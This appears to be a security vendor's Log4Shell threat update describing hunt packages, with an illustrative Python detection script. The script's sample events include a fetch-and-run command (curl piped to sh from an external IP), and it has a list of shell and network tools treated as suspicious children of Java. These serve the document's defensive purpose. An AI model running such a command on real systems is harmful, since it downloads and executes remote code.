Log4Shell Threat Update – 2 Jan 2022
Cyborg Security has published an additional three Hunt Packages related to CVE-2021-44228 (Log4Shell), with the intent of providing more robust coverage based on new attack techniques and new uses of the exploit. Reports have indicated that the exploit can serve a variety of end goals: as a way to move laterally once an initial system has been compromised, as demonstrated by the Conti ransomware, or as a way to “worm” through an environment, as demonstrated by the Mirai botnet. Because of these new tactics, hunting for process execution anomalies, rather than for the initial exploit itself, is likely the most effective way to identify potential infections.
One of the three additional packages published this week (Suspicious Child Process for Java – Potential CVE-2021-44228 Exploitation (Log4Shell)) provides logic to identify child processes of Java that should be uncommon in normal operations and that are consistent with attacks seen in the wild and with research performed by Cyborg Security analysts. This package helps analysts and threat hunters identify a potentially compromised host, regardless of whether it was the initially compromised server or was compromised via lateral movement.

The other two packages (Known Java SPI Port Usage Related to CVE-2021-44228 (Log4Shell) & Unusual Java Port Usage – Potential CVE-2021-44228 (Log4Shell)) cover Java processes reaching out to non-RFC 1918 (non-internal) IP space over known Log4Shell ports and over non-standard ports. These two packages help analysts and threat hunters identify the initially compromised device, or an opportunistically compromised device reaching out to the Internet for payload download and execution. Review the “Deployment Requirements” and the logic for each package; they capture observations made during research and development and will help you apply the provided logic as effectively as possible. As always, all of the packages include details of how to identify, analyze, and respond to the applicable threat, as well as references, metadata and other useful information to best arm analysts to properly defend your enterprise.
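As an added illustration of the two hunting ideas above (example code written for this page, not Cyborg Security's Hunt Package logic), the script below runs both checks over a small set of constructed process and network events: the list of suspicious Java child images, the known Log4Shell and standard port sets, and the RFC 1918 ranges are assumptions to tune for your environment.

```python
import ipaddress

# Constructed sample telemetry for this example (not from the original page): simplified
# process-creation and network-connection events recorded on one host.
SAMPLE_EVENTS = [
    {"type": "process", "parent": "java", "image": "/bin/sh", "cmdline": "sh -c 'curl http://203.0.113.5/s | sh'"},
    {"type": "process", "parent": "java", "image": "/usr/lib/jvm/bin/jspawnhelper", "cmdline": "jspawnhelper"},
    {"type": "process", "parent": "bash", "image": "/usr/bin/curl", "cmdline": "curl https://repo.internal/pkg"},
    {"type": "network", "image": "java", "dst_ip": "10.20.30.40", "dst_port": 8080},
    {"type": "network", "image": "java", "dst_ip": "203.0.113.5", "dst_port": 1389},
    {"type": "network", "image": "java", "dst_ip": "198.51.100.9", "dst_port": 443},
    {"type": "network", "image": "java", "dst_ip": "198.51.100.7", "dst_port": 4444},
]

# Assumed tuning lists (the page does not enumerate them); adjust to your environment.
SUSPICIOUS_JAVA_CHILDREN = {"sh", "bash", "dash", "cmd.exe", "powershell.exe", "curl", "wget", "nc"}
KNOWN_LOG4SHELL_PORTS = {389, 636, 1099, 1389}  # LDAP/LDAPS/RMI ports commonly used by JNDI lookups
STANDARD_PORTS = {80, 443}                       # ordinary web egress, not flagged by this logic
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def is_external(ip: str) -> bool:
    """True for destinations outside RFC 1918 space; loopback and link-local count as internal."""
    addr = ipaddress.ip_address(ip)
    return not (addr.is_loopback or addr.is_link_local or any(addr in net for net in RFC1918))

def hunt_suspicious_java_children(events):
    """Child processes of java whose image a JVM rarely spawns in normal operation."""
    hits = []
    for e in events:
        if e["type"] == "process" and e["parent"] == "java":
            name = e["image"].replace("\\", "/").rsplit("/", 1)[-1].lower()
            if name in SUSPICIOUS_JAVA_CHILDREN:
                hits.append(e)
    return hits

def hunt_java_external_ports(events):
    """Java egress to non-RFC1918 space, tagged as a known Log4Shell port or an unusual port."""
    findings = []
    for e in events:
        if e["type"] != "network" or e["image"] != "java" or not is_external(e["dst_ip"]):
            continue
        if e["dst_port"] in KNOWN_LOG4SHELL_PORTS:
            findings.append(("known_log4shell_port", e))
        elif e["dst_port"] not in STANDARD_PORTS:
            findings.append(("unusual_port", e))
    return findings

if __name__ == "__main__":
    print([h["cmdline"] for h in hunt_suspicious_java_children(SAMPLE_EVENTS)])
    print([(r, e["dst_ip"], e["dst_port"]) for r, e in hunt_java_external_ports(SAMPLE_EVENTS)])
```

On the sample data only the shell spawned by java and the two external connections on ports 1389 and 4444 are reported; the internal 8080 connection and the external 443 connection are deliberately left alone.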
Log4Shell Threat Update – 12 Dec 2021
Log4Shell (CVE-2021-44228), a remote code execution vulnerability in the Apache Log4j 2 framework, was observed in December 2021. The vulnerability was first discovered by Chen Zhaojun of Alibaba Cloud Security. Log4j 2 is an open source, third-party Java logging library, typically used to log error messages, and it is embedded in a large number of applications. Because Java is so widely used by companies and online services, an increase in exploitation of this vulnerability (if ignored) is expected. Cybersecurity firms have confirmed mass scanning in the wild for applications affected by the vulnerability.
The severity of Log4Shell was scored a 10 by the CVSS rating system, and affected versions range from 2.0-beta9 to 2.14.1. It has been observed to allow an attacker to execute arbitrary code on a vulnerable system and even potentially take control of the system. This is done by forcing the target application to write a single string to the log; because of the “message lookup substitution” function, the attacker is subsequently able to upload their own code. As an example of the ease of exploitation, attackers were able to gain RCE on Minecraft servers just by pasting a specially crafted message into the game’s chat box.